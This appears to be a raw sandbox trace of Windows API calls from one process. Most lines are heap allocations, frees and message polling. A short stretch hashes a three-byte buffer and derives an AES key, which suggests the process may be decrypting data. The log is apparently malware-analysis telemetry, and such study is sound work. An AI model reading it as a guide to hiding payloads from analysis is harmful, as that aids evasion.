(HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0164.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0164.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0164.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0164.765] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0164.765] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0164.765] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0164.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0164.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0164.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0164.765] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0164.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0164.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0164.766] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0164.766] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0164.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0164.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0164.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0164.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0164.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0164.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0164.766] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0164.766] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0164.766] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0164.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0164.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0164.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0164.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0164.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0164.766] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0164.767] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0164.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0164.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0060 [0164.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0070 [0164.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0164.767] CryptCreateHash (in: hProv=0xab2890, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0164.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0164.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0164.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00f0 [0164.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0164.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0164.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0164.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00e0 [0164.767] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0164.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0164.767] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0164.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0164.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0164.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0164.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0164.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0090 [0164.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0164.768] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.768] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0164.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0164.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0164.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0164.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0164.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0164.768] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0164.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0164.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0164.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0164.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0164.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0164.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0164.768] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0164.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0164.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0164.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0164.769] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0164.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0164.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0164.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0164.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0164.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0090 [0164.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0164.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00a0 [0164.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0164.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0080 [0164.769] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0164.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0164.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0164.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466d90 [0164.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0164.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0164.769] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0164.769] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0164.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0164.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0164.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0164.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0164.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00b0 [0164.770] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0164.770] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0164.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0164.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00e0 [0164.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0164.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0164.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00d0 [0164.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0164.770] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0164.770] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0164.770] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0164.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0164.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00e0 [0164.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0164.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0164.770] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00d0 [0164.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0164.771] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0164.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0164.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00d0 [0164.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00e0 [0164.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0164.771] CryptHashData (hHash=0xaa5660, pbData=0x34a00a0, dwDataLen=0x3, dwFlags=0x1) returned 1 [0164.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0164.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0164.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0130 [0164.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0164.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0164.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0164.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0120 [0164.771] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0164.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0164.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0164.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0164.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0164.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0164.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0164.771] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0100 [0164.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0164.772] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.772] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0164.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0164.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0164.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0164.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0164.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00b0 [0164.772] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0164.772] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0164.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0164.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0164.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0164.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0164.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0100 [0164.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0164.772] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0164.772] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0164.772] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0164.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0164.772] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0164.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0164.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0164.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0100 [0164.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0164.773] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0164.773] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0164.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0164.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0164.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0164.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0164.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0100 [0164.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0164.773] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0164.773] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0164.773] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0164.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0164.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0164.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0164.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0164.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0100 [0164.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0164.773] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0164.773] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0164.774] CryptDeriveKey (in: hProv=0xab2890, Algid=0x6601, hBaseData=0xaa5660, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa55e0) returned 1 [0164.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0164.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0164.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0164.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0164.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0164.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0164.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0164.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0164.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0164.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0164.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0164.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0164.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0164.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0164.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0164.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0164.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0164.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0164.774] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0164.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0164.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0164.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0070 | out: hHeap=0x25c0000) returned 1 [0164.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0164.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0164.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0164.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0164.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0164.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0164.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0164.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0164.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0164.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0164.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0164.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0164.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0164.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0164.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0164.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0164.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0164.775] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0164.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0164.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0164.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0164.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0164.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0164.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0164.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0164.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0164.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0164.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0164.776] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 